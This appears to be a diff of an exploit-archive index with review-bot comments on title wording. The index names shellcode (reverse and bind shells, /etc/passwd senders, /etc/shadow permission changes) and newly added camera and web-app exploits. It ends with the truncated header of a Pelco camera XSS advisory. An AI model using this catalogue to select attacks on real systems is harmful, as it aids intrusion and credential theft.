34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Connect Back Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0 34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Connect Back Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0
34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add map in /etc/hosts file (google.com 127.1.1.1) Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0 34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0
35205,platforms/lin_x86-64/shellcode/35205.txt,"Linux/x86-64 - Position independent + execve(_/bin/sh\0__NULL_NULL); Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,lin_x86-64,shellcode,0 35205,platforms/lin_x86-64/shellcode/35205.txt,"Linux/x86-64 - Position independent + execve(_/bin/sh\0__NULL_NULL); Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,lin_x86-64,shellcode,0
35519,platforms/lin_x86/shellcode/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,lin_x86,shellcode,0 35519,platforms/lin_x86/shellcode/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,lin_x86,shellcode,0
35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind 4444/TCP Shellcode (81 bytes / 96 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind 4444/TCP Shellcode (81 bytes / 96 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
@ -16172,7 +16173,7 @@ id,file,description,date,author,platform,type,port
36359,platforms/lin_x86-64/shellcode/36359.c,"Linux/x86-64 - Reads Data From /etc/passwd To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",lin_x86-64,shellcode,0 36359,platforms/lin_x86-64/shellcode/36359.c,"Linux/x86-64 - Reads Data From /etc/passwd To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",lin_x86-64,shellcode,0
36391,platforms/lin_x86/shellcode/36391.c,"Linux/x86 - execve(_/bin/sh_) (ROT13 Encoded) Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36391,platforms/lin_x86/shellcode/36391.c,"Linux/x86 - execve(_/bin/sh_) (ROT13 Encoded) Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36393,platforms/lin_x86/shellcode/36393.c,"Linux/x86 - chmod 0777 /etc/shadow obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36393,platforms/lin_x86/shellcode/36393.c,"Linux/x86 - chmod 0777 /etc/shadow obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36394,platforms/lin_x86/shellcode/36394.c,"Linux/x86 - Add Map google.com to 127.1.1.1 Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36394,platforms/lin_x86/shellcode/36394.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36395,platforms/lin_x86/shellcode/36395.c,"Linux/x86 - execve(_/bin/sh_) Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36395,platforms/lin_x86/shellcode/36395.c,"Linux/x86 - execve(_/bin/sh_) Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36397,platforms/lin_x86/shellcode/36397.c,"Linux/x86 - Reverse TCP Shell Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36397,platforms/lin_x86/shellcode/36397.c,"Linux/x86 - Reverse TCP Shell Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - Bind Shell 33333/TCP Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - Bind Shell 33333/TCP Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
@ -16206,11 +16207,11 @@ id,file,description,date,author,platform,type,port
37393,platforms/lin_x86/shellcode/37393.asm,"Linux/x86 - exec('/bin/dash') Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 37393,platforms/lin_x86/shellcode/37393.asm,"Linux/x86 - exec('/bin/dash') Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0
37401,platforms/lin_x86-64/shellcode/37401.asm,"Linux/x86-64 - execve Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",lin_x86-64,shellcode,0 37401,platforms/lin_x86-64/shellcode/37401.asm,"Linux/x86-64 - execve Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",lin_x86-64,shellcode,0
37427,platforms/lin_x86-64/shellcode/37427.txt,"Linux/x86-64 - execve Encoded Shellcode (57 bytes)",2015-06-29,"Bill Borskey",lin_x86-64,shellcode,0 37427,platforms/lin_x86-64/shellcode/37427.txt,"Linux/x86-64 - execve Encoded Shellcode (57 bytes)",2015-06-29,"Bill Borskey",lin_x86-64,shellcode,0
37495,platforms/lin_x86/shellcode/37495.py,"Linux/x86 - /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",lin_x86,shellcode,0 37495,platforms/lin_x86/shellcode/37495.py,"Linux/x86 - /bin/sh (ROT7 Encoded) Shellcode",2015-07-05,"Artem T",lin_x86,shellcode,0
37664,platforms/win_x86/shellcode/37664.c,"Win32/XP SP3 (TR) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,win_x86,shellcode,0 37664,platforms/win_x86/shellcode/37664.c,"Win32/XP SP3 (TR) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,win_x86,shellcode,0
37749,platforms/lin_x86/shellcode/37749.c,"Linux/x86 - Egghunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",lin_x86,shellcode,0 37749,platforms/lin_x86/shellcode/37749.c,"Linux/x86 - Egghunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",lin_x86,shellcode,0
37758,platforms/win_x86/shellcode/37758.c,"Windows x86 - user32!MessageBox 'Hello World!' Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,win_x86,shellcode,0 37758,platforms/win_x86/shellcode/37758.c,"Windows x86 - user32!MessageBox 'Hello World!' Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,win_x86,shellcode,0
37762,platforms/lin_x86/shellcode/37762.py,"Linux/x86 - /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",lin_x86,shellcode,0 37762,platforms/lin_x86/shellcode/37762.py,"Linux/x86 - /bin/sh (ROL/ROR Encoded) Shellcode",2015-08-12,"Anastasios Monachos",lin_x86,shellcode,0
37895,platforms/win_x86-64/shellcode/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",win_x86-64,shellcode,0 37895,platforms/win_x86-64/shellcode/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",win_x86-64,shellcode,0
38065,platforms/osx/shellcode/38065.txt,"OSX/x86-64 - /bin/sh Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",osx,shellcode,0 38065,platforms/osx/shellcode/38065.txt,"OSX/x86-64 - /bin/sh Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",osx,shellcode,0
38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z - Bind Shell 12345/TCP Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",system_z,shellcode,0 38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z - Bind Shell 12345/TCP Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",system_z,shellcode,0
@ -16234,7 +16235,7 @@ id,file,description,date,author,platform,type,port
39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0 39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
39312,platforms/lin_x86-64/shellcode/39312.c,"Linux/x86-64 - execve (xor/not/div Encoded) Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0 39312,platforms/lin_x86-64/shellcode/39312.c,"Linux/x86-64 - execve (xor/not/div Encoded) Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0
39336,platforms/linux/shellcode/39336.c,"Linux x86/x86-64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 39336,platforms/linux/shellcode/39336.c,"Linux x86/x86-64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - tcp_bind Port 4444 Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - Bind 4444/TCP Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
39338,platforms/linux/shellcode/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 39338,platforms/linux/shellcode/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - shell_reverse_tcp Password Polymorphic Shellcode (1) (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0 39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - shell_reverse_tcp Password Polymorphic Shellcode (1) (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0
39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - shell_reverse_tcp Password Polymorphic Shellcode (2) (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0 39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - shell_reverse_tcp Password Polymorphic Shellcode (2) (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
@ -16271,7 +16272,7 @@ id,file,description,date,author,platform,type,port
40005,platforms/win_x86/shellcode/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40005,platforms/win_x86/shellcode/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
40026,platforms/lin_x86/shellcode/40026.txt,"Linux/x86 - /bin/sh + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",lin_x86,shellcode,0 40026,platforms/lin_x86/shellcode/40026.txt,"Linux/x86 - /bin/sh + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",lin_x86,shellcode,0
40029,platforms/lin_x86-64/shellcode/40029.c,"Linux/x86-64 - /etc/passwd File Sender Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 40029,platforms/lin_x86-64/shellcode/40029.c,"Linux/x86-64 - /etc/passwd File Sender Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - Bind NetCat Shellcode (64 bytes)",2016-07-04,Kyzer,lin_x86-64,shellcode,0 40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - Bind Netcat Shellcode (64 bytes)",2016-07-04,Kyzer,lin_x86-64,shellcode,0
40056,platforms/lin_x86/shellcode/40056.c,"Linux/x86 - Bind Shell 4444/TCP Shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode,0 40056,platforms/lin_x86/shellcode/40056.c,"Linux/x86 - Bind Shell 4444/TCP Shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode,0
40061,platforms/lin_x86-64/shellcode/40061.c,"Linux/x86-64 - Ncat Shellcode (SSL_ MultiChannel_ Persistant_ Fork_ IPv4/6_ Password) (176 bytes)",2016-07-06,Kyzer,lin_x86-64,shellcode,0 40061,platforms/lin_x86-64/shellcode/40061.c,"Linux/x86-64 - Ncat Shellcode (SSL_ MultiChannel_ Persistant_ Fork_ IPv4/6_ Password) (176 bytes)",2016-07-06,Kyzer,lin_x86-64,shellcode,0
40075,platforms/lin_x86/shellcode/40075.c,"Linux/x86 - Reverse TCP Shellcode (75 bytes)",2016-07-08,sajith,lin_x86,shellcode,0 40075,platforms/lin_x86/shellcode/40075.c,"Linux/x86 - Reverse TCP Shellcode (75 bytes)",2016-07-08,sajith,lin_x86,shellcode,0
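Review bot: the 40052 line in this hunk normalizes "NetCat" to "Netcat", but the neighbouring 40061 description in the same hunk still carries the misspelling "Persistant" (should be "Persistent"); since this region is already being touched, correct it in the same pass so the Netcat-related descriptions are consistent.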
@ -16284,7 +16285,7 @@ id,file,description,date,author,platform,type,port
40175,platforms/win_x86/shellcode/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40175,platforms/win_x86/shellcode/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - Bind Netcat with Port Shellcode (44/52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0 40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - Bind Netcat with Port Shellcode (44/52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0
40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - Bind zsh 9090/TCP Shellcode (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - Bind zsh 9090/TCP Shellcode (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - Reverse zsh 9090/TCP Shellcode (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - Reverse ZSH 127.255.255.254:9090/TCP Shellcode (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
40245,platforms/win_x86/shellcode/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40245,platforms/win_x86/shellcode/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
40246,platforms/win_x86/shellcode/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40246,platforms/win_x86/shellcode/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
40259,platforms/win_x86/shellcode/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40259,platforms/win_x86/shellcode/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
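Review bot: the new 40223 description capitalizes "ZSH" while the sibling 40222 entry two lines above keeps "zsh", and the address is written as "127.255.255.254:9090/TCP" rather than the parenthesized form used elsewhere in this file (e.g. 25497 "Reverse TCP (192.168.1.10:31337)" and 39336 "reverse_tcp (192.168.1.29:4444)"); suggest "Linux/x86 - Reverse zsh (127.255.255.254:9090) Shellcode (80 bytes)" so the pair 40222/40223 reads consistently.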
@ -16300,10 +16301,10 @@ id,file,description,date,author,platform,type,port
41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0 41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0
41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86-64 - Bind 5600/TCP - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0 41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86-64 - Bind 5600/TCP - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0
41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0 41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0
41183,platforms/linux/shellcode/41183.c,"Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0 41183,platforms/linux/shellcode/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0
41220,platforms/linux/shellcode/41220.c,"Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0 41220,platforms/linux/shellcode/41220.c,"Linux - Reverse Shell Multi/Dual Mode Shellcode (Genearator) (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0
41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0 41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0 41375,platforms/linux/shellcode/41375.c,"Linux - Bind Shell Dual/Multi Mode Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0
41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0 41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
41398,platforms/lin_x86-64/shellcode/41398.nasm,"Linux/x86-64 - Reverse TCP Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",lin_x86-64,shellcode,0 41398,platforms/lin_x86-64/shellcode/41398.nasm,"Linux/x86-64 - Reverse TCP Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",lin_x86-64,shellcode,0
41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,lin_x86,shellcode,0 41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,lin_x86,shellcode,0
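Review bot: the new 41220 description introduces the typo "(Genearator)"; it should be "(Generator)", matching the form already used for the 14261 ARM entry. Also, the reworded 41183 and 41375 lines spell the same qualifier in two orders ("Multi/Dual Mode" vs "Dual/Multi Mode"); pick one so the three odzhancode entries sort and search together.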
@ -16314,8 +16315,8 @@ id,file,description,date,author,platform,type,port
41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0 41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - Setuid(0) + Execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0 41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - Setuid(0) + Execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Flush IPTables Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0 41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Flush IPTables Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - Reverse NetCat Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0 41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - Reverse Netcat Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Reverse NetCat Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0 41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Reverse Netcat Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0 41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0
41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - exceve(_/bin/sh_) Encoded Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0 41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - exceve(_/bin/sh_) Encoded Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0
41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0 41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0
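Review bot: the 41510 line keeps the path "platforms/lin_x86-64/shellcode/41510.nsam" while the sibling 41509 entry uses the ".nasm" extension; if the on-disk file really is named "41510.nsam" the path is correct as a record, but if it is a typo the path column must be fixed together with the file, so please confirm which. The unchanged 41630 description in this hunk also carries "exceve(" for "execve(", which could be corrected while the hunk is open.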
@ -32904,7 +32905,7 @@ id,file,description,date,author,platform,type,port
32455,platforms/php/webapps/32455.pl,"Website Directory - 'index.php' Cross-Site Scripting",2008-10-03,"Ghost Hacker",php,webapps,0 32455,platforms/php/webapps/32455.pl,"Website Directory - 'index.php' Cross-Site Scripting",2008-10-03,"Ghost Hacker",php,webapps,0
32459,platforms/java/webapps/32459.txt,"VeriSign Kontiki Delivery Management System 5.0 - 'action' Parameter Cross-Site Scripting",2008-10-05,"Mazin Faour",java,webapps,0 32459,platforms/java/webapps/32459.txt,"VeriSign Kontiki Delivery Management System 5.0 - 'action' Parameter Cross-Site Scripting",2008-10-05,"Mazin Faour",java,webapps,0
32461,platforms/php/webapps/32461.txt,"AmpJuke 0.7.5 - 'index.php' SQL Injection",2008-10-03,S_DLA_S,php,webapps,0 32461,platforms/php/webapps/32461.txt,"AmpJuke 0.7.5 - 'index.php' SQL Injection",2008-10-03,S_DLA_S,php,webapps,0
32462,platforms/php/webapps/32462.txt,"Simple Machines Forum (SMF) 1.1.6 - HTTP POST Request Filter Security Bypass",2008-10-06,WHK,php,webapps,0 32462,platforms/php/webapps/32462.txt,"Simple Machines Forum (SMF) 1.1.6 - POST Request Filter Security Bypass",2008-10-06,WHK,php,webapps,0
32463,platforms/php/webapps/32463.txt,"PHP Web Explorer 0.99b - main.php refer Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 32463,platforms/php/webapps/32463.txt,"PHP Web Explorer 0.99b - main.php refer Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
32464,platforms/php/webapps/32464.txt,"PHP Web Explorer 0.99b - 'edit.php' File Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 32464,platforms/php/webapps/32464.txt,"PHP Web Explorer 0.99b - 'edit.php' File Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
32467,platforms/php/webapps/32467.txt,"Opera Web Browser 8.51 - URI redirection Remote Code Execution",2008-10-08,MATASANOS,php,webapps,0 32467,platforms/php/webapps/32467.txt,"Opera Web Browser 8.51 - URI redirection Remote Code Execution",2008-10-08,MATASANOS,php,webapps,0
@ -38120,3 +38121,10 @@ id,file,description,date,author,platform,type,port
42284,platforms/hardware/webapps/42284.py,"Humax HG100R 2.0.6 - Backup File Download",2017-06-30,gambler,hardware,webapps,0 42284,platforms/hardware/webapps/42284.py,"Humax HG100R 2.0.6 - Backup File Download",2017-06-30,gambler,hardware,webapps,0
42293,platforms/hardware/webapps/42293.txt,"OpenDreamBox 2.0.0 Plugin WebAdmin - Remote Code Execution",2017-07-03,"Jonatas Fil",hardware,webapps,0 42293,platforms/hardware/webapps/42293.txt,"OpenDreamBox 2.0.0 Plugin WebAdmin - Remote Code Execution",2017-07-03,"Jonatas Fil",hardware,webapps,0
42290,platforms/linux/webapps/42290.txt,"BOA Web Server 0.94.14rc21 - Arbitrary File Access",2017-06-20,"Miguel Mendez Z",linux,webapps,0 42290,platforms/linux/webapps/42290.txt,"BOA Web Server 0.94.14rc21 - Arbitrary File Access",2017-06-20,"Miguel Mendez Z",linux,webapps,0
42306,platforms/linux/webapps/42306.txt,"NfSen < 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection",2017-07-10,"Paul Taylor",linux,webapps,0
42307,platforms/hardware/webapps/42307.txt,"Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery / Cross-Site Scripting",2017-07-10,LiquidWorm,hardware,webapps,0
42308,platforms/hardware/webapps/42308.txt,"Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery (Enable SSH Root Access)",2017-07-10,LiquidWorm,hardware,webapps,0
42309,platforms/hardware/webapps/42309.txt,"Pelco Sarix/Spectra Cameras - Remote Code Execution",2017-07-10,LiquidWorm,hardware,webapps,0
42311,platforms/windows/webapps/42311.txt,"Pelco VideoXpert 1.12.105 - Directory Traversal",2017-07-10,LiquidWorm,windows,webapps,0
42312,platforms/windows/webapps/42312.txt,"Pelco VideoXpert 1.12.105 - Information Disclosure",2017-07-10,LiquidWorm,windows,webapps,0
42314,platforms/linux/webapps/42314.txt,"NfSen < 1.3.7 / AlienVault OSSIM 4.3.1 - 'customfmt' Command Injection",2017-07-11,"Paul Taylor",linux,webapps,0
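Review bot: the two new NfSen entries (42306 and 42314) come from the same author one day apart and both say "NfSen < 1.3.7 / AlienVault OSSIM", yet they cite different OSSIM versions (5.3.4 and 4.3.1) and only the second names the 'customfmt' parameter; confirm that these are two distinct issues rather than a duplicate submission, and that the version numbers are intended, since the descriptions are what users search on.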

@ -0,0 +1,168 @@
Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)
Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)
Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)
Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)
Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed
for security surveillance in a wide variety of commercial and industrial
settings. From our industry-leading fixed and high-speed IP cameras to
panoramic, thermal imaging, explosionproof and more, we offer a camera
for any environment, any lighting condition and any application.
When nothing but the best will do. Sarix™ Enhanced Range cameras
provide the most robust feature-set for your mission-critical applications.
With SureVision™ 3.0, Sarix Enhanced delivers the best possible image
in difficult lighting conditions such as a combination of bright areas,
shaded areas, and intense light. Designed with superior reliability,
fault tolerance, and processing speed, these rugged fixed IP cameras
ensure you always get the video that you need.
Desc: Pelco cameras suffer from multiple dom-based, stored and reflected
XSS vulnerabilities when input passed via several parameters to several
